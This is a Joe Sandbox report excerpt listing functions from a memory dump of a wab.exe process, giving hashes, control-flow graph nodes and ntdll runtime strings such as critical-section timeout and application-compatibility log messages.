                            • String ID:
                            • API String ID:
                            • Opcode ID: ce5daaf0029466d7b1a1dc0e41168220947de494bc5c7527d086b01685adf168
                            • Instruction ID: ff5f572ebdf8a1e807608db9372cfe3e01b695d074311d193018be08cd256489
                            • Opcode Fuzzy Hash: ce5daaf0029466d7b1a1dc0e41168220947de494bc5c7527d086b01685adf168
                            • Instruction Fuzzy Hash: 6490022160140903D501B5584484656000B47D0341F95C072A502851AECA358A92A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72EE0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3194e56dc567f7019ffc94613033eba1e4578f9b61fd6792b2653b22169623e1
                            • Instruction ID: 181608d294964ec86e1049b0d128fbc72856f7901267c460865e6c881a536cfd
                            • Opcode Fuzzy Hash: 3194e56dc567f7019ffc94613033eba1e4578f9b61fd6792b2653b22169623e1
                            • Instruction Fuzzy Hash: 4C90026120180803D540B9584884647000647D0302F55C061A606851AE8A398D516135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72E30 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c0b4c8222dcf70a7e7b783afd24ccb3fe76257b1d2f9f4f19214cd7ab7fceb8
                            • Instruction ID: ef544f38115cc3d36f37eb57e8aafe45c15efa1da8cbd0957afdd39b16145016
                            • Opcode Fuzzy Hash: 8c0b4c8222dcf70a7e7b783afd24ccb3fe76257b1d2f9f4f19214cd7ab7fceb8
                            • Instruction Fuzzy Hash: 6E90022130140803D502B5584494646000A87D1345F95C062E542851AD86358A53A132
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72DB0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f97e8f17e7fc70e1a976d09a05ce96421023d1adf366ea4636892dd91afce2eb
                            • Instruction ID: 0de5b7623af7c87b1587af80b226784a6f1080da84d5e7e7da917db71579c557
                            • Opcode Fuzzy Hash: f97e8f17e7fc70e1a976d09a05ce96421023d1adf366ea4636892dd91afce2eb
                            • Instruction Fuzzy Hash: 7C90023124140803D541B5584484646000A57D0341F95C062A4428519E86658B56AA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72DD0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78f1d4961016652ef96e4855252c8be29c62e3212853fe98955fc00b6fa5cca7
                            • Instruction ID: 34d950f48a582ef3054d3256131b758197fa29a5faf38f428b95d5668ba89238
                            • Opcode Fuzzy Hash: 78f1d4961016652ef96e4855252c8be29c62e3212853fe98955fc00b6fa5cca7
                            • Instruction Fuzzy Hash: 8F900221242445535945F5584484547400757E0341795C062A5418915C85369956D621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cee616acf05e366d7ee6355d54822846d084050ca24e3d05c256d2fca941ea50
                            • Instruction ID: 7974888fbcbe90f7232cf0bcbea0edba95a12ced06ba51ed731f1d6532a57b12
                            • Opcode Fuzzy Hash: cee616acf05e366d7ee6355d54822846d084050ca24e3d05c256d2fca941ea50
                            • Instruction Fuzzy Hash: FB90022130140403D540B5585498646400697E1301F55D061E4418519CD92589565222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B73D10 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08359e9f0994c502db469b3950ea449bd4a2ce9b83148e83b5d07e8735a01cc2
                            • Instruction ID: 967da89a4ea967e3074ec81dae2c2dc2a2be401c8f130d2923b660d9735bba2d
                            • Opcode Fuzzy Hash: 08359e9f0994c502db469b3950ea449bd4a2ce9b83148e83b5d07e8735a01cc2
                            • Instruction Fuzzy Hash: 59900231202405439940B6585884A8E410647E1302B95D465A4019519CC92489615221
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 512212dcb706980358a9b03a140532ffecb2f5499bab188dcbdaf27f31cad756
                            • Instruction ID: ad151ac9a24bb91f8b49480d7676f498ec9985153e5daeb019f73a4ec8718f61
                            • Opcode Fuzzy Hash: 512212dcb706980358a9b03a140532ffecb2f5499bab188dcbdaf27f31cad756
                            • Instruction Fuzzy Hash: 5890022921340403D580B558548864A000647D1302F95D465A401951DCC92589695321
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72D00 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e4f23ad3f85ab23fa2f0ef3975bf1f7824cf70ad74393118f5980f0e75a3fd2
                            • Instruction ID: 930e49a9c58ded0a9a01d7a62d4fc2edaa928e41f985af7eb4e0d5c24e4fa4fe
                            • Opcode Fuzzy Hash: 2e4f23ad3f85ab23fa2f0ef3975bf1f7824cf70ad74393118f5980f0e75a3fd2
                            • Instruction Fuzzy Hash: 5390022120544843D500B9585488A46000647D0305F55D061A506855ADC6358951A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B73D70 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42431c81ab41ea7db1df5c5a5460724a229758fe3f55d255c7bf840f12747264
                            • Instruction ID: 578cd61ff26b297932fa68bbf929f4574f756b81869aae83a582700328475d4b
                            • Opcode Fuzzy Hash: 42431c81ab41ea7db1df5c5a5460724a229758fe3f55d255c7bf840f12747264
                            • Instruction Fuzzy Hash: 8390023520140803D910B5585884686004747D0301F55D461A442851DD866489A1A121
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72CA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2093470166834c7edbfd15dbec573cb56bdf7d5383d28be1686e3d57399de6c8
                            • Instruction ID: 799c06da35751fd896c5b3e2f6392171f76c6dbdbc5abe79c9b15cad520c4149
                            • Opcode Fuzzy Hash: 2093470166834c7edbfd15dbec573cb56bdf7d5383d28be1686e3d57399de6c8
                            • Instruction Fuzzy Hash: 4490023120140803D500B9985488686000647E0301F55D061A902851AEC67589916131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72CF0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2928b1ab8fdd02b9e83ea0e1cc2c6428b186dd8899e278473be8040b4a149876
                            • Instruction ID: eacaa224bc546ac8e73d75e5c1e4f837a2d945e8acbb42c83966e6f4817a4631
                            • Opcode Fuzzy Hash: 2928b1ab8fdd02b9e83ea0e1cc2c6428b186dd8899e278473be8040b4a149876
                            • Instruction Fuzzy Hash: 6190023120140803D500B5585588747000647D0301F55D461A442851DDD66689516121
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a6642f6b212fbd7444b477beb4386b62911010a40828cbf8242430f8834602f5
                            • Instruction ID: 94efb33b238d1ea39c422cf6578f4e36b1e0b0f4fd415b47f0c248bb6c67689c
                            • Opcode Fuzzy Hash: a6642f6b212fbd7444b477beb4386b62911010a40828cbf8242430f8834602f5
                            • Instruction Fuzzy Hash: E990022160540803D540B5585498746001647D0301F55D061A4028519DC6698B5566A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72C60 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3bef46cc1b74dfe0c6beacbbe292d00ecab63242d223f95c23e9508bb1090585
                            • Instruction ID: 094a57bf8e2cd7afe7bcf390113ca1fc0c2967d90a2126ea81b5b029bba0a332
                            • Opcode Fuzzy Hash: 3bef46cc1b74dfe0c6beacbbe292d00ecab63242d223f95c23e9508bb1090585
                            • Instruction Fuzzy Hash: CF90023120140C43D500B5584484B86000647E0301F55C066A4128619D8625C9517521
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction ID: 4cfa98345832c42c204c398e9d7e1be2709e26070cdf714aa797b8848e214330
                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 693 23b72890-23b728b3 694 23baa4bc-23baa4c0 693->694 695 23b728b9-23b728cc 693->695 694->695 698 23baa4c6-23baa4ca 694->698 696 23b728ce-23b728d7 695->696 697 23b728dd-23b728df 695->697 696->697 699 23baa57e-23baa585 696->699 700 23b728e1-23b728e5 697->700 698->695 701 23baa4d0-23baa4d4 698->701 699->697 703 23b728eb-23b728fa 700->703 704 23b72988-23b7298e 700->704 701->695 702 23baa4da-23baa4de 701->702 702->695 705 23baa4e4-23baa4eb 702->705 706 23baa58a-23baa58d 703->706 707 23b72900-23b72905 703->707 708 23b72908-23b7290c 704->708 709 23baa4ed-23baa4f4 705->709 710 23baa564-23baa56c 705->710 706->708 707->708 708->700 711 23b7290e-23b7291b 708->711 712 23baa50b 709->712 713 23baa4f6-23baa4fe 709->713 710->695 716 23baa572-23baa576 710->716 714 23b72921 711->714 715 23baa592-23baa599 711->715 718 23baa510-23baa536 call 23b80050 712->718 713->695 717 23baa504-23baa509 713->717 719 23b72924-23b72926 714->719 722 23baa5a1-23baa5c9 call 23b80050 715->722 716->695 720 23baa57c call 23b80050 716->720 717->718 734 23baa55d-23baa55f 718->734 724 23b72993-23b72995 719->724 725 23b72928-23b7292a 719->725 720->734 724->725 729 23b72997-23b729b1 call 23b80050 724->729 730 23b72946-23b72966 call 23b80050 725->730 731 23b7292c-23b7292e 725->731 743 23b72969-23b72974 729->743 730->743 731->730 737 23b72930-23b72944 call 23b80050 731->737 740 23b72981-23b72985 734->740 737->730 743->719 744 23b72976-23b72979 743->744 744->722 745 23b7297f 744->745 745->740
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 0241e9e64cd2a546afbd8cd22fb446b8af7adcbfb68378c6f37809cb579a7ea8
                            • Instruction ID: df08d3d5a43f158a98197d9f8aa124db5446b22c0c47758e978ba1f686e5fcfd
                            • Opcode Fuzzy Hash: 0241e9e64cd2a546afbd8cd22fb446b8af7adcbfb68378c6f37809cb579a7ea8
                            • Instruction Fuzzy Hash: 8151B7B6E14556BFCB10DF98889097EFBB8FB49240B1482F9E4B8D7641D234DF408BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 950 23b67630-23b67651 951 23b67653-23b6766f call 23b3e660 950->951 952 23b6768b-23b67699 call 23b74c30 950->952 957 23ba4638 951->957 958 23b67675-23b67682 951->958 961 23ba463f-23ba4645 957->961 959 23b67684 958->959 960 23b6769a-23b676a9 call 23b67818 958->960 959->952 966 23b67701-23b6770a 960->966 967 23b676ab-23b676c1 call 23b677cd 960->967 963 23b676c7-23b676d0 call 23b67728 961->963 964 23ba464b-23ba46b8 call 23bbf290 call 23b79020 BaseQueryModuleData 961->964 963->966 975 23b676d2 963->975 964->963 987 23ba46be-23ba46c6 964->987 973 23b676d8-23b676e1 966->973 967->961 967->963 977 23b676e3-23b676f2 call 23b6771b 973->977 978 23b6770c-23b6770e 973->978 975->973 979 23b676f4-23b676f6 977->979 978->979 983 23b67710-23b67719 979->983 984 23b676f8-23b676fa 979->984 983->984 984->959 986 23b676fc 984->986 988 23ba47be-23ba47d0 call 23b72c50 986->988 987->963 990 23ba46cc-23ba46d3 987->990 988->959 990->963 992 23ba46d9-23ba46e4 990->992 993 23ba46ea-23ba4723 call 23bbf290 call 23b7aaa0 992->993 994 23ba47b9 call 23b74d48 992->994 1000 23ba473b-23ba476b call 23bbf290 993->1000 1001 23ba4725-23ba4736 call 23bbf290 993->1001 994->988 1000->963 1006 23ba4771-23ba477f call 23b7a770 1000->1006 1001->966 1009 23ba4781-23ba4783 1006->1009 1010 23ba4786-23ba47a3 call 23bbf290 call 23bacf9e 1006->1010 1009->1010 1010->963 1015 23ba47a9-23ba47b2 1010->1015 1015->1006 1016 23ba47b4 1015->1016 1016->963
                            Strings
                            • Execute=1, xrefs: 23BA4713
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 23BA4742
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 23BA4725
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 23BA4655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 23BA46FC
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 23BA4787
                            • ExecuteOptions, xrefs: 23BA46A0
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: f60211649abaa4908bb65cf1844ffff82f4038940d218440206ea0cfb866c3d0
                            • Instruction ID: e3c69315c4ecd05ed5b56e3aa99e6252e95e92d4195262c8a86289a7f888d17b
                            • Opcode Fuzzy Hash: f60211649abaa4908bb65cf1844ffff82f4038940d218440206ea0cfb866c3d0
                            • Instruction Fuzzy Hash: DA51FB31A003597ADB10EEA8DC8AFAE77B8EF18304F1400F9EA15A7592DB719E45CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 3d3a73d1f26ed6c1dde9e72bf4cdbf522ab1444999020483f0a54e329fc161ed
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: C681CE72E452498EDF14DF68C890BEEBBB6EF45360F1842BAD970A73A1C73489408F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 23BA02E7
                            • RTL: Re-Waiting, xrefs: 23BA031E
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 23BA02BD
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: 8385d8d7b66abcd050e140fc64b039a4a4c4ad075cc54e7a28ea348d9a913b3a
                            • Instruction ID: 527adfc992474d8729a013e370c806888f06ef3ce045fb7acee4b6a509d90abe
                            • Opcode Fuzzy Hash: 8385d8d7b66abcd050e140fc64b039a4a4c4ad075cc54e7a28ea348d9a913b3a
                            • Instruction Fuzzy Hash: 75E19A31608B81DFD721DF28C888B1AB7E5FB88364F144AB9F5A48B2E1D774D945CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 23BA7B7F
                            • RTL: Re-Waiting, xrefs: 23BA7BAC
                            • RTL: Resource at %p, xrefs: 23BA7B8E
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 10693ee383efdb6ba173ba431e0121ba3d1f08daaa1d4fda3b920e0266ce6960
                            • Instruction ID: 287a38d6590254fec1e82d9aeb3e5011f2724c35603fea2db33869b0686f38e6
                            • Opcode Fuzzy Hash: 10693ee383efdb6ba173ba431e0121ba3d1f08daaa1d4fda3b920e0266ce6960
                            • Instruction Fuzzy Hash: C041E0317047028FC724DE2AC851B5AB7F9EB98310F100ABDE999DB6A1DB30E5058F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 23BA728C
                            Strings
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 23BA7294
                            • RTL: Re-Waiting, xrefs: 23BA72C1
